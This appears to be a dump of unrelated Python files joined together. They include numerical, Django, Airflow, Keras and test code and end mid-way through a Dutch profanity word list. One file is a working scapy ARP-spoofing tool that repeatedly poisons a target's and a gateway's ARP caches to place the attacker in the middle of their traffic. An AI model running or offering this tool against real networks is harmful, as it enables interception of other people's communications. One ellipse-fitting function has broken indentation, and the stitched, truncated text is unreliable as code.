from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import absolute_import
import numpy as np
from b2ac.compat import *
import b2ac.matrix.matrix_operations as mo
import b2ac.eigenmethods.qr_algorithm as qr
import b2ac.eigenmethods.inverse_iteration as inv_iter
def fit_improved_B2AC_double(points):
    """Ellipse fitting in Python with improved B2AC algorithm as described in
    this `paper <http://autotrace.sourceforge.net/WSCG98.pdf>`_.
    This version of the fitting uses float storage during calculations and performs the
    eigensolver on a float array. It only uses `b2ac` package methods for fitting, to
    be as similar to the integer implementation as possible.
    :param points: The [Nx2] array of points to fit ellipse to.
    :type points: :py:class:`numpy.ndarray`
    :return: The conic section array defining the fitted ellipse.
    :rtype: :py:class:`numpy.ndarray`
    :raises ArithmeticError: if no eigenvector yields an elliptical solution.
    """
    e_conds = []
    points = np.array(points, 'float')
    M, T = _calculate_M_and_T_double(points)
    # Eigenvalues of the 3x3 reduced scatter matrix, in ascending order.
    e_vals = sorted(qr.QR_algorithm_shift_Givens_double(M)[0])
    a = None
    for ev_ind in [1, 2, 0]:
        # Find the eigenvector that matches this eigenvector.
        eigenvector = inv_iter.inverse_iteration_for_eigenvector_double(M, e_vals[ev_ind], 5)
        # See if that eigenvector yields an elliptical solution.
        elliptical_condition = (4 * eigenvector[0] * eigenvector[2]) - (eigenvector[1] ** 2)
        e_conds.append(elliptical_condition)
        if elliptical_condition > 0:
            a = eigenvector
            break
    if a is None:
        print("Eigenvalues = {0}".format(e_vals))
        print("Elliptical conditions = {0}".format(e_conds))
        raise ArithmeticError("No elliptical solution found.")
    # Recover the remaining 3 conic coefficients from T and concatenate.
    conic_coefficients = np.concatenate((a, np.dot(T, a)))
    return conic_coefficients
def _calculate_M_and_T_double(points):
    """Part of the B2AC ellipse fitting algorithm, calculating the M and T
    matrices needed.
    :param points: The [Nx2] array of points to fit ellipse to.
    :type points: :py:class:`numpy.ndarray`
    :return: Matrices M and T.
    :rtype: tuple
    """
    S = _calculate_scatter_matrix_double(points[:, 0], points[:, 1])
    # Split the 6x6 scatter matrix: quadratic part S1, mixed part S2, and
    # linear part S3 (stored as its 6 unique entries for the symmetric
    # 3x3 inverse helper).
    S1 = S[:3, :3]
    S3 = np.array([S[3, 3], S[3, 4], S[3, 5], S[4, 4], S[4, 5], S[5, 5]])
    S3_inv = mo.inverse_symmetric_3by3_double(S3).reshape((3, 3))
    S2 = S[:3, 3:]
    T = -np.dot(S3_inv, S2.T)
    M_term_2 = np.dot(S2, T)
    M = S1 + M_term_2
    # Apply the inverse constraint matrix: swap/scale rows 0 and 2,
    # negate row 1.
    M[[0, 2], :] = M[[2, 0], :] / 2
    M[1, :] = -M[1, :]
    return M, T
def _calculate_scatter_matrix_double(x, y):
"""Calculates the complete scatter matrix for the input coordinates.
:param x: The x coordinates.
:type x: :py:class:`numpy.ndarray`
:param y: The y coordinates.
:type y: :py:class:`numpy.ndarray`
:return: The complete scatter matrix.
:rtype: :py:class:`numpy.ndarray`
"""
D = np.ones((len(x), 6), 'int64')
D[:, 0] = x * x
D[:, 1] = x * y
D[:, 2] = y * y
D[:, 3] = x
D[:, 4] = y
return D.T.dot(D)
|
from django.core.exceptions import PermissionDenied
from django.utils.crypto import get_random_string
from rest_framework_jwt.settings import api_settings
from utils.constants import AUTO_GENERATED_PASSWORD_LENGTH
# binding.pry equivalent
# import code; code.interact(local=locals())
def get_hustler_data(hustler_object):
    """
    Serializes a Hustler object for JSON
    :param hustler_object: Hustler object
    :return: dict
    """
    # Imported lazily to avoid a circular import with the serializers module.
    from hustlers.api.serializers import HustlerSerializer
    return HustlerSerializer(hustler_object).data
def jwt_response_payload_handler(token=None, user=None, request=None):
    """
    Custom JWT payload creator
    /auth/login/ will redirects to this endpoint
    User auth using tokens or user object wrapper around vanilla auth/login
    :param token: JWT token
    :param user: User object
    :param request: Request object
    :return: dict with "auth_token" and serialized "hustler_data"
    :raises PermissionDenied: if the user has no hustler or is inactive
    """
    # Only users with an associated, active hustler may authenticate.
    if hasattr(user, "hustler"):
        if user.is_active is False:
            raise PermissionDenied("Hustler is inactive")
    else:
        raise PermissionDenied("Hustler does not exist!")
    hustler_data = get_hustler_data(user.hustler)
    if token is None:
        # No token supplied: build one from the user via the configured
        # rest_framework_jwt payload/encode handlers.
        jwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER
        jwt_encode_handler = api_settings.JWT_ENCODE_HANDLER
        payload = jwt_payload_handler(user)
        token = jwt_encode_handler(payload)
    return_data = {"auth_token": token, "hustler_data": hustler_data}
    return return_data
def generate_hustler_password(length_of_password=AUTO_GENERATED_PASSWORD_LENGTH):
    """
    Generate a random password for a newly created hustler.
    :param length_of_password: desired length (defaults to
        AUTO_GENERATED_PASSWORD_LENGTH)
    :return: random string of the requested length
    """
    return get_random_string(length_of_password)
|
from .handlers import bp
__all__ = ("bp",)
|
import traceback
from typing import Union, Callable
from functools import wraps, partial
from asyncio import iscoroutinefunction
from lite_tools.utils_jar.logs import my_logger, logger, handle_exception
__ALL__ = ["try_catch"]
def try_catch(func=None, *,
              default=None, log: Union[bool, str] = True, catch: bool = False,
              err_callback: Callable = None, err_args: tuple = None):
    """
    Exception-catching decorator.
    --> used without arguments: swallow the exception and return None
    --> used with arguments, as follows:
    :param func        : the decorated function (bound automatically)
    :param default     : value returned when an exception is caught
    :param log         : whether to log the error, True by default (if a
                         string is passed, that string is logged instead of
                         the traceback details)
    :param catch       : capture the exception with a full stack trace
    :param err_callback: callback invoked when an error occurs; pass the
                         function itself
    :param err_args    : positional arguments for err_callback, as a tuple;
                         must match your err_callback (see the demo)
    """
    if func is None:
        # Called with keyword arguments: return a partially-applied decorator.
        return partial(try_catch, default=default, log=log, catch=catch, err_callback=err_callback, err_args=err_args)
    def __log_true():
        # Extract location/type/detail of the active exception for logging.
        line, fl, exception_type, exception_detail = handle_exception(traceback.format_exc(), func.__name__)
        if err_callback is not None:
            try:
                if isinstance(err_args, tuple):
                    err_callback(*err_args)
                else:
                    err_callback()
            except Exception as err:
                if log is True:
                    logger.error(f"传入的回调函数不存在或者报错: {err}")
        if catch is True:
            # Full stack-trace capture via loguru.
            logger.opt(exception=True, colors=True, capture=True).error("Information: ↓ ↓ ↓ ")
        elif log and isinstance(log, str):
            # A custom message string was supplied instead of True.
            logger.error(log)
        else:
            my_logger(fl, func.__name__, line, f"{exception_type} --> {exception_detail}")
    @wraps(func)
    def wrapper(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except KeyboardInterrupt:
            exit(0)
        except Exception as err:
            _ = err
            if log:
                __log_true()
            return default
    @wraps(func)
    async def async_wrapper(*args, **kwargs):
        try:
            return await func(*args, **kwargs)
        except KeyboardInterrupt:
            exit(0)
        except Exception as err:
            _ = err
            if log:
                __log_true()
            return default
    # Pick the wrapper matching the decorated function's (a)sync-ness.
    return async_wrapper if iscoroutinefunction(func) else wrapper
|
"""
Code that goes along with the Airflow located at:
http://airflow.readthedocs.org/en/latest/tutorial.html
"""
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from datetime import datetime, timedelta
from airflow.operators.python_operator import PythonOperator
import calcul
import init
import insert
# DAG-level defaults applied to every task below.
default_args = {
    "owner": "airflow",
    "depends_on_past": False,
    "start_date": datetime(2015, 6, 1),
    "email": ["airflow@airflow.com"],
    "email_on_failure": False,
    "email_on_retry": False,
    "retries": 1,
    "retry_delay": timedelta(minutes=5),
    # 'queue': 'bash_queue',
    # 'pool': 'backfill',
    # 'priority_weight': 10,
    # 'end_date': datetime(2016, 1, 1),
}
# Daily schedule: timedelta(1) is one day.
dag = DAG("tutorial", default_args=default_args,
          schedule_interval=timedelta(1))
# t1, t2 and t3 are examples of tasks created by instantiating operators
t1 = PythonOperator(task_id="calcul", python_callable=calcul.calcul, dag=dag)
t2 = PythonOperator(task_id="init", python_callable=init.init, dag=dag)
t3 = PythonOperator(task_id="insert", python_callable=insert.insert, dag=dag)
# Pipeline order: calcul -> init -> insert.
t2.set_upstream(t1)
t3.set_upstream(t2)
|
# This file is part of Indico.
# Copyright (C) 2002 - 2020 CERN
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see the
# LICENSE file for more details.
from __future__ import unicode_literals
from indico.modules.events.controllers.admin import (RHCreateEventLabel, RHCreateReferenceType, RHDeleteEventLabel,
RHDeleteReferenceType, RHEditEventLabel, RHEditReferenceType,
RHEventLabels, RHReferenceTypes)
from indico.modules.events.controllers.creation import RHCreateEvent
from indico.modules.events.controllers.display import RHEventAccessKey, RHEventMarcXML, RHExportEventICAL
from indico.modules.events.controllers.entry import event_or_shorturl
from indico.web.flask.util import make_compat_redirect_func, redirect_view
from indico.web.flask.wrappers import IndicoBlueprint
# Blueprint for event admin, creation, display and legacy-URL routes.
_bp = IndicoBlueprint('events', __name__, template_folder='templates', virtual_template_folder='events')
# Admin
_bp.add_url_rule('/admin/external-id-types/', 'reference_types', RHReferenceTypes, methods=('GET', 'POST'))
_bp.add_url_rule('/admin/external-id-types/create', 'create_reference_type', RHCreateReferenceType,
                 methods=('GET', 'POST'))
_bp.add_url_rule('/admin/event-labels/', 'event_labels', RHEventLabels, methods=('GET', 'POST'))
_bp.add_url_rule('/admin/event-labels/create', 'create_event_label', RHCreateEventLabel, methods=('GET', 'POST'))
# Single reference type
_bp.add_url_rule('/admin/external-id-types/<int:reference_type_id>/edit', 'update_reference_type', RHEditReferenceType,
                 methods=('GET', 'POST'))
_bp.add_url_rule('/admin/external-id-types/<int:reference_type_id>', 'delete_reference_type', RHDeleteReferenceType,
                 methods=('DELETE',))
# Single event label
_bp.add_url_rule('/admin/event-labels/<int:event_label_id>/edit', 'update_event_label', RHEditEventLabel,
                 methods=('GET', 'POST'))
_bp.add_url_rule('/admin/event-labels/<int:event_label_id>', 'delete_event_label', RHDeleteEventLabel,
                 methods=('DELETE',))
_bp.add_url_rule('/event/<confId>/event.ics', 'export_event_ical', RHExportEventICAL)
# Creation
_bp.add_url_rule('/event/create/<any(lecture,meeting,conference):event_type>', 'create', RHCreateEvent,
                 methods=('GET', 'POST'))
# Main entry points supporting shortcut URLs
# /e/ accepts slashes, /event/ doesn't - this is intended. We do not want to support slashes in the old namespace
# since it's a major pain in the ass to do so (and its route would eat anything that's usually a 404)
_bp.add_url_rule('/e/<path:confId>', 'shorturl', event_or_shorturl, strict_slashes=False,
                 defaults={'shorturl_namespace': True})
_bp.add_url_rule('/event/<confId>/', 'display', event_or_shorturl)
_bp.add_url_rule('/event/<confId>/overview', 'display_overview', event_or_shorturl, defaults={'force_overview': True})
_bp.add_url_rule('/event/<confId>/other-view', 'display_other', redirect_view('timetable.timetable'))
# Misc
_bp.add_url_rule('/event/<confId>/key-access', 'key_access', RHEventAccessKey, methods=('POST',))
_bp.add_url_rule('/event/<confId>/event.marc.xml', 'marcxml', RHEventMarcXML)
# Legacy URLs
# Separate blueprint redirecting old mod_python-era URLs to the new routes.
_compat_bp = IndicoBlueprint('compat_events', __name__)
_compat_bp.add_url_rule('/conferenceDisplay.py', 'display_modpython', make_compat_redirect_func(_bp, 'display'))
_compat_bp.add_url_rule('/conferenceOtherViews.py', 'display_other_modpython',
                        make_compat_redirect_func(_bp, 'display_other'))
_compat_bp.add_url_rule('/conferenceDisplay.py/overview', 'display_overview_modpython',
                        make_compat_redirect_func(_bp, 'display_overview'))
_compat_bp.add_url_rule('/event/<confId>/my-conference/', 'display_mystuff', make_compat_redirect_func(_bp, 'display'))
_compat_bp.add_url_rule('/myconference.py', 'display_mystuff_modpython', make_compat_redirect_func(_bp, 'display'))
|
from .conversions import (get_interaction_operator,
get_diagonal_coulomb_hamiltonian, get_molecular_data,
get_quadratic_hamiltonian)
from .fourier_transforms import fourier_transform, inverse_fourier_transform
from .operator_tapering import freeze_orbitals, prune_unused_indices
from .qubit_operator_transforms import (project_onto_sector, projection_error,
rotate_qubit_by_pauli)
from .qubit_tapering_from_stabilizer import (StabilizerError,
check_commuting_stabilizers,
check_stabilizer_linearity,
reduce_number_of_terms,
taper_off_qubits, fix_single_term)
from .weyl_ordering import (mccoy, weyl_polynomial_quantization,
symmetric_ordering)
|
import BaseClass
from AModule import aFunc, bFunc
class AClass( BaseClass.ABaseClass ):
    """Example subclass combining val1 (from the base) with val2."""
    def __init__( self, val1, val2 ):
        # BUG FIX: super() must name this class, not the base class; the
        # original `super( ABaseClass, self )` was also a NameError since
        # ABaseClass is only imported as BaseClass.ABaseClass.
        super( AClass, self ).__init__( val1 )
        self.val2 = val2
    def meth1( self, aval ):
        # Scale aval by val1*val2 before delegating to the base method.
        val = self.val1 * self.val2 + aval
        return super( AClass, self ).meth1( val )
    def meth2( self, astr ):
        return func( astr, self.val1, self.val2 )
def func( a, b, c ):
    # Module-level helper used by AClass.meth2: combine a and b with aFunc,
    # then fold c into the result with bFunc.
    x = aFunc( a, b )
    return bFunc( c, x )
|
import hashlib
import re
from trac.config import *
from trac.core import *
from userpictures import IUserPicturesProvider
class UserPicturesGravatarProvider(Component):
    """Trac user-picture provider backed by Gravatar.

    Resolves a username (or an author string containing an email address)
    to an email, then builds the corresponding Gravatar avatar URL.
    """
    implements(IUserPicturesProvider)
    # from trac source
    _long_author_re = re.compile(r'.*<([^@]+)@([^@]+)>\s*|([^@]+)@([^@]+)')
    @property
    def email_map(self):
        # Lazily build and cache a username -> email map from known users.
        if hasattr(self, '_email_map'):
            return self._email_map
        _email_map = {}
        for username, name, email in self.env.get_known_users():
            _email_map[username] = email
        setattr(self, '_email_map', _email_map)
        return self._email_map
    def get_src(self, req, username, size):
        """Return the Gravatar image URL for ``username`` at ``size`` px."""
        email = ''
        if '@' not in username:
            if username != 'anonymous':
                email = self.email_map.get(username) or ''
        else:
            # Author strings like "Name <user@host>" or plain "user@host".
            author_info = self._long_author_re.match(username)
            if author_info:
                if author_info.group(1):
                    email = '%s@%s' % author_info.group(1, 2)
                elif author_info.group(3):
                    email = '%s@%s' % author_info.group(3, 4)
        # NOTE(review): md5() of a str only works on Python 2; Python 3
        # would need email.encode(). Gravatar also expects the address
        # lowercased — confirm against the deployment's Trac/Python version.
        email_hash = hashlib.md5(email).hexdigest()
        # Match the request scheme so the avatar loads without mixed content.
        if req.base_url.startswith("https://"):
            href = "https://gravatar.com/avatar/" + email_hash
        else:
            href = "http://www.gravatar.com/avatar/" + email_hash
        href += "?size=%s" % size
        return href
|
import os
import json
from keras.models import Model
# Models and their metadata files are stored next to this module.
STORE_DIR = os.path.dirname(__file__)
def save_model(
        model: Model,
        name: str,
        embedding_size: int,
        epochs: int,
        batch_size: int,
        validation_split: float) -> None:
    """
    save the keras model to the storage directory.
    The target path encodes the hyperparameters (see get_model_title).
    :param model: Model
    :param name : str
        -> name of this model to differentiate it from other ones
           with the same set of parameters
    :param embedding_size   : int (min: 0, max: 999)
    :param epochs           : int (min: 0, max: 9999)
    :param batch_size       : int (min: 0, max: 999)
    :param validation_split : float (min: 0.0, max: 1.0)
    """
    file_path = get_model_title(name, embedding_size, epochs, batch_size, validation_split)
    print("storing model into %s" % file_path)
    model.save(file_path)
def save_model_metadata(
        metadata: dict,
        name: str,
        embedding_size: int,
        epochs: int,
        batch_size: int,
        validation_split: float) -> None:
    """ store the model's metadata as JSON next to the model file;
    see save_model for parameters """
    file_path = get_model_title(name, embedding_size, epochs, batch_size, validation_split)
    file_path_json = file_path.replace(".h5", ".json")
    # BUG FIX: log the actual .json destination, not the .h5 model path.
    print("storing model metadata into %s" % file_path_json)
    with open(file_path_json, "w") as model_metadata_file:
        json.dump(metadata, model_metadata_file)
def load_model_metadata(model_path: str) -> dict:
    """
    Load the metadata dict stored alongside a saved model.
    :param model_path: path to the model's .h5 file; metadata is read from
        the matching .json file.
    :return: dict
    """
    model_path_json = model_path.replace(".h5", ".json")
    # BUG FIX: typo in the log message ("matadata" -> "metadata").
    print("loading model metadata from %s" % model_path_json)
    with open(model_path_json, "r") as model_metadata_file:
        content = model_metadata_file.read()
        return json.loads(content)
def get_model_title(
        name: str,
        embedding_size: int,
        epochs: int,
        batch_size: int,
        validation_split: float) -> str:
    """
    Build the full .h5 path "<STORE_DIR>/<name>__<suffix>.h5" for a model.
    Same parameters as save_model. See above.
    """
    model_suffix = _get_model_suffix(embedding_size, epochs, batch_size, validation_split)
    file_path = "%s/%s__%s.h5" % (STORE_DIR, name, model_suffix)
    return file_path
def _get_model_suffix(
embedding_size: int,
epochs: int,
batch_size: int,
validation_split: float) -> str:
"""
returns a suffix to add to the model name when saving. this
suffix encodes the model's hyperparameters.
This has the same parameters as save_model. See above.
:return : str
"""
es = str(embedding_size).rjust(3, "0")
ep = str(epochs).rjust(4, "0")
bs = str(batch_size).rjust(3, "0")
vs = str(round(validation_split, 3)).ljust(5, "0").replace(".", "-")
return "%s_%s_%s_%s" % (es, ep, bs, vs)
|
# Copyright 2021 Sheng Wang.
# Affiliation: Mathematical Institute, University of Oxford
# Email: sheng.wang@maths.ox.ac.uk
import os
import random
import numpy as np
import marketmodel.loader as loader
import marketmodel.utils as utils
from marketmodel.loader import DataHestonSlv
from marketmodel.factors import PrepTrainData, DecodeFactor
from marketmodel.neuralsde import Train, Simulate
def run():
    """End-to-end pipeline: load Heston-SLV simulation data, decode market
    factors, train the neural-SDE models (S, mu, xi), and run forward
    simulations.

    NOTE(review): relies entirely on the marketmodel package helpers;
    inputs/outputs live under input/ and output/, hyperparameters come
    from utils.Config.
    """
    # load Heston-SLV simulation data
    fname = 'input/sim_hestonslv.pkl'
    St, vt, list_exp, list_mny, cs_ts_raw, cs_ts, mask_quality_value, \
        Ts, ks, mat_A, vec_b = loader.load_hestonslv_data(fname)
    # load configurations
    hp_sde_transform = utils.Config.hp_sde_transform
    hp_model_S = utils.Config.hp_model_S
    hp_model_mu = utils.Config.hp_model_mu
    hp_model_xi = utils.Config.hp_model_xi
    # fit an initial model for S
    dir_initial_model_S = 'output/checkpoint/initial_model_S/'
    X_S, Y_S = PrepTrainData.prep_data_model_S_initial(
        St, cs_ts, max_PC=7, factor_multiplier=1e5)
    model_S_initial = Train.train_S(X_S, Y_S,
                                    hp_model_S['pruning_sparsity'],
                                    hp_model_S['validation_split'],
                                    hp_model_S['batch_size'],
                                    hp_model_S['epochs'],
                                    rand_seed=0, force_fit=False,
                                    model_name='model_S',
                                    out_dir=dir_initial_model_S)
    # calculate derivatives for the normalised call prices
    cT_ts, cm_ts, cmm_ts = PrepTrainData.calc_call_derivatives(
        list_mny, list_exp, cs_ts_raw, mask_quality_value)
    # decode factor
    G, X, dX, S, dS, W, b, idxs_remove, scales_X = \
        DecodeFactor.decode_factor_dasa(
            cs_ts, St, model_S_initial, X_S, cT_ts, cm_ts, cmm_ts, mat_A, vec_b,
            hp_sde_transform['norm_factor'])
    # drop the timestamps removed during factor decoding
    cT_ts = np.delete(cT_ts, idxs_remove, axis=0)
    cm_ts = np.delete(cm_ts, idxs_remove, axis=0)
    cmm_ts = np.delete(cmm_ts, idxs_remove, axis=0)
    # calibrate a hypterparameter for normalising distance
    dist_X = np.abs(W.dot(X.T) - b[:, None]) / \
        np.linalg.norm(W, axis=1, keepdims=True)
    critical_threshold = hp_sde_transform['frac_critical_threshold'] * np.min(
        np.max(dist_X, axis=1))
    dist_multiplier = (1. / (
        1 - hp_sde_transform['critical_value']) - 1) / critical_threshold
    # pre-calculate diffusion scaling data
    proj_scale = hp_sde_transform['proj_scale']
    Omegas, det_Omega, proj_dX = PrepTrainData.calc_diffusion_scaling(
        W, b, X, dX, dist_multiplier, proj_scale)
    # pre-calculate drift correction data
    X_interior, corr_dirs, epsmu = PrepTrainData.calc_drift_correction(
        W, b, X, hp_sde_transform['rho_star'], hp_sde_transform['epsmu_star'])
    # set paths
    run_batch_name = 'train_batch_1'
    out_dir = f'output/checkpoint/{run_batch_name}/'
    out_dir_plot = out_dir + 'plot/'
    print(f'Write in the folder {out_dir}.')
    if not os.path.exists(out_dir):
        os.mkdir(out_dir)
    if not os.path.exists(out_dir_plot):
        os.mkdir(out_dir_plot)
    # one training/simulation pass per seed pair
    list_rand_seed = [5]
    list_sim_rand_seed = [5]
    for rand_seed in list_rand_seed:
        # set random seed
        os.environ['PYTHONHASHSEED'] = str(rand_seed)
        random.seed(rand_seed)
        np.random.seed(rand_seed)
        # train the model for S
        X_S, Y_S = PrepTrainData.prep_data_model_S(
            S, dS, X, hp_model_xi['factor_multiplier'])
        model_S = Train.train_S(X_S, Y_S,
                                hp_model_S['pruning_sparsity'],
                                hp_model_S['validation_split'],
                                hp_model_S['batch_size'],
                                hp_model_S['epochs'],
                                rand_seed=rand_seed, force_fit=False,
                                model_name='model_S',
                                out_dir=out_dir)
        # fit model for the baseline drift
        mu_base = PrepTrainData.calc_baseline_drift(
            cT_ts, cm_ts, cmm_ts, model_S, X_S, G, scales_X)
        model_mu = Train.train_mu(X_S, mu_base,
                                  hp_model_mu['validation_split'],
                                  hp_model_mu['batch_size'],
                                  hp_model_mu['epochs'],
                                  rand_seed=rand_seed, force_fit=False,
                                  model_name='model_mu',
                                  out_dir=out_dir)
        # train the model for xi
        mu_base_est = model_mu.predict(X_S)
        z_ts = PrepTrainData.calc_zt(cT_ts, cm_ts, cmm_ts, model_S, X_S)
        X_xi, Y_xi = PrepTrainData.prepare_data_model_xi(
            S, X, proj_dX, Omegas, det_Omega, corr_dirs, epsmu, mu_base_est, z_ts,
            hp_model_xi['factor_multiplier'])
        model_xi = Train.train_xi(X_xi, Y_xi, W, G,
                                  hp_model_xi['lbd_penalty_eq'],
                                  hp_model_xi['lbd_penalty_sz'],
                                  hp_model_xi['pruning_sparsity'],
                                  hp_model_mu['validation_split'],
                                  hp_model_mu['batch_size'],
                                  hp_model_xi['epochs'],
                                  rand_seed=rand_seed, force_fit=False,
                                  model_name='model_xi', out_dir=out_dir)
        # forward simulation
        N = 10000
        dt = 1e-3
        for sim_rand_seed in list_sim_rand_seed:
            out_dir_sim = out_dir + 'sim/'
            if not os.path.exists(out_dir_sim):
                os.mkdir(out_dir_sim)
            Simulate.simulate_S_xi(
                dt, N, model_S, model_xi, model_mu, S, X, W, b,
                hp_model_xi['factor_multiplier'], dist_multiplier, proj_scale,
                hp_sde_transform['rho_star'], hp_sde_transform['epsmu_star'],
                X_interior,
                rand_seed, sim_rand_seed,
                force_simulate=True, reflect=False, out_dir=out_dir_sim)
if __name__ == '__main__':
    run()
|
# Generated by Django 3.2 on 2021-11-17 23:57
from django.db import migrations, models
import django.db.models.deletion
import news.models
class Migration(migrations.Migration):
    """Make News.supporters/tags optional (blank=True) and add NewsImage."""
    dependencies = [
        ('events', '0011_auto_20211117_2214'),
        ('news', '0006_auto_20211117_2219'),
    ]
    operations = [
        migrations.AlterField(
            model_name='news',
            name='supporters',
            field=models.ManyToManyField(blank=True, help_text='Show logos/links', to='events.Supporter'),
        ),
        migrations.AlterField(
            model_name='news',
            name='tags',
            field=models.ManyToManyField(blank=True, to='events.Tag'),
        ),
        # New model: images attached to a news item, deleted with it.
        migrations.CreateModel(
            name='NewsImage',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('image', models.FileField(upload_to=news.models.get_upload_dir)),
                ('news', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='images', to='news.news')),
            ],
        ),
    ]
|
#!/usr/bin/env python
import scapy.all as scapy
import time
import sys
import argparse
def get_range():
    """Parse the -t/--target and -r/--spoof CLI options.

    Exits with a usage error (via parser.error) if either is missing.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--target", dest="target", help="use this to set the target ip")
    parser.add_argument("-r", "--spoof", dest="gateway", help="use this to set the gateway ip")
    opts = parser.parse_args()
    if not opts.target:
        parser.error("[-] Please specify the target's IP, use --help for more info")
    if not opts.gateway:
        parser.error("[-] Please specify the gateway IP, use --help for more info")
    return opts
def get_mac(ip):
    """Return the MAC address of `ip`, discovered via a broadcast ARP who-has."""
    query = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") / scapy.ARP(pdst=ip)
    replies = scapy.srp(query, timeout=1, verbose=False)[0]
    # NOTE(review): raises IndexError when no host answers within the
    # timeout -- confirm callers expect that rather than a None return.
    return replies[0][1].hwsrc
def spoof(target_ip, spoof_ip):
    """Send one forged is-at ARP reply telling target_ip that we own spoof_ip."""
    victim_mac = get_mac(target_ip)
    # op=2 is an ARP reply; hwsrc defaults to our own interface MAC.
    forged = scapy.ARP(op=2, psrc=spoof_ip, pdst=target_ip, hwdst=victim_mac)
    scapy.send(forged, verbose=False)
def restore(dst_ip, src_ip):
    """Re-send the genuine ARP mapping so dst_ip's cache is corrected."""
    dst_mac = get_mac(dst_ip)
    src_mac = get_mac(src_ip)
    fix_packet = scapy.ARP(op=2, pdst=dst_ip, psrc=src_ip,
                           hwdst=dst_mac, hwsrc=src_mac)
    # count=10: repeat the correct mapping so it survives packet loss.
    scapy.send(fix_packet, count=10, verbose=False)
# Main loop: poison both the target's and the gateway's ARP caches once a
# second until interrupted, then restore the true mappings.
args = get_range()
try:
    packet_count = 0
    while True:
        # Fixed: the old trailing comma after print(...) was a Python 2
        # "suppress newline" idiom; in Python 3 it just built a throwaway
        # tuple and every iteration printed on a new line. end="" keeps the
        # counter updating in place on one line.
        print("\r[+] Packets sent: " + str(packet_count), end="")
        spoof(args.target, args.gateway)
        spoof(args.gateway, args.target)
        packet_count += 2
        sys.stdout.flush()
        time.sleep(1)
except KeyboardInterrupt:
    print("\n\n[+] Detected CTRL + C...... \nResetting ARP tables. Please wait.....")
    restore(args.gateway, args.target)
    restore(args.target, args.gateway)
|
def process(self):
    """Derive glyph names for the CJK Compatibility Forms range."""
    # Edits applied strictly in order: later steps see earlier results
    # (e.g. "DOUBLE WAVY" must be renamed before the bare "DOUBLE" replace).
    steps = [
        ("edit", "PRESENTATION FORM FOR"),
        ("edit", "LOW LINE", "underscore"),
        ("edit", "LEFT PARENTHESIS", "parenleft"),
        ("edit", "RIGHT PARENTHESIS", "parenright"),
        ("edit", "LEFT CURLY BRACKET", "braceleft"),
        ("edit", "RIGHT CURLY BRACKET", "braceright"),
        ("edit", "DOUBLE WAVY", "dblwavy"),
        ("replace", "DOUBLE", "dbl"),
        ("edit", "WAVY", "wavy"),
        ("edit", "DASHED", "dashed"),
        ("edit", "CENTRELINE", "centerline"),
        ("edit", "LEFT", "left"),
        ("edit", "RIGHT", "right"),
        ("edit", "VERTICAL", "vertical"),
    ]
    for method, *arguments in steps:
        getattr(self, method)(*arguments)

    # self.edit("SQUARE", "fullwidth")
    # self.edit("IDEOGRAPHIC TELEGRAPH SYMBOL FOR", "telegraph")
    # self.edit("-")
    # self.processAs("Helper Digit Names")
    self.lower()
    self.compress()
# Manual invocation: print the generated glyph names for this Unicode range.
if __name__ == "__main__":
    from glyphNameFormatter.exporters import printRange
    printRange("CJK Compatibility Forms")
|
import pytest
from wazimap_ng.profile.serializers import ProfileSerializer, FullProfileSerializer
from tests.cms.factories import PageFactory, ContentFactory
from tests.profile.factories import ProfileFactory
@pytest.fixture
def profile():
    """A Profile instance named "Test Profile"."""
    return ProfileFactory(name="Test Profile")
@pytest.fixture
def page(profile):
    """A CMS Page on `profile`; api_mapping places its content under "help_text"."""
    return PageFactory(profile=profile, name="Test Page", api_mapping="help_text")
@pytest.fixture
def content(page):
    """A single Content entry attached to `page` at order 0."""
    return ContentFactory(
        page=page, title="Title for test page", text="Text for 1st content page", order=0
    )
@pytest.mark.django_db
class TestProfileSerializer:
    """ProfileSerializer output with no pages, empty pages, and populated pages."""

    def test_output_without_pages(self, profile):
        data = ProfileSerializer(profile).data
        assert data["name"] == "Test Profile"
        assert data["configuration"] == {}

    def test_output_with_pages_but_no_content(self, profile, page):
        assert page.name == "Test Page"
        data = ProfileSerializer(profile).data
        assert data["name"] == "Test Profile"
        assert data["configuration"] == {}

    def test_output_with_pages_with_content(self, profile, page, content):
        assert page.name == "Test Page"
        data = ProfileSerializer(profile).data
        assert data["name"] == "Test Profile"
        expected_configuration = {
            "help_text": [{
                "image": None,
                "title": "Title for test page",
                "text": "Text for 1st content page",
            }]
        }
        assert data["configuration"] == expected_configuration
@pytest.mark.django_db
class TestFullProfileSerializer:
    """FullProfileSerializer output — mirrors TestProfileSerializer.

    Fixed: the two page-based tests instantiated ProfileSerializer
    (copy-paste from the class above), so FullProfileSerializer was never
    exercised with pages; they now use FullProfileSerializer.
    """

    def test_output_without_pages(self, profile):
        serializer = FullProfileSerializer(profile)
        assert serializer.data["name"] == "Test Profile"
        assert serializer.data["configuration"] == {}

    def test_output_with_pages_but_no_content(self, profile, page):
        serializer = FullProfileSerializer(profile)
        assert page.name == "Test Page"
        assert serializer.data["name"] == "Test Profile"
        assert serializer.data["configuration"] == {}

    def test_output_with_pages_with_content(self, profile, page, content):
        serializer = FullProfileSerializer(profile)
        assert page.name == "Test Page"
        assert serializer.data["name"] == "Test Profile"
        assert serializer.data["configuration"] == {
            "help_text": [{
                "image": None,
                "title": "Title for test page",
                "text": "Text for 1st content page"
            }]
        }
|
import pickle
from revscoring.datasources import revision_oriented
from revscoring.dependencies import solve
from revscoring.languages import dutch
from .util import compare_extraction
# Dutch profanity / slur word list fed to the badwords matcher.
# Fixed: removed duplicate entries ("poep", "sukkel", "verkracht") and
# corrected several comment typos.
BAD = [
    # Curses
    "aars",  # ass
    "anaal", "anus",  # anal, anus
    "balhaar",  # ball hair (testicular hair)
    "debiel",  # infirm
    "diaree", "diarree",  # diarrhea
    "drol", "drollen",  # turd
    "fack", "facking", "focking",  # misspelling of "fuck"
    "flikker", "flikkers",  # pejorative for gay person ("faggot")
    "geil", "geile",  # horny
    "gelul",  # bullshit
    "hoer", "hoere", "hoeren",  # whore
    "homo", "homos",  # add "homo's" ; pejorative for gay person
    "kak", "kaka",  # poop
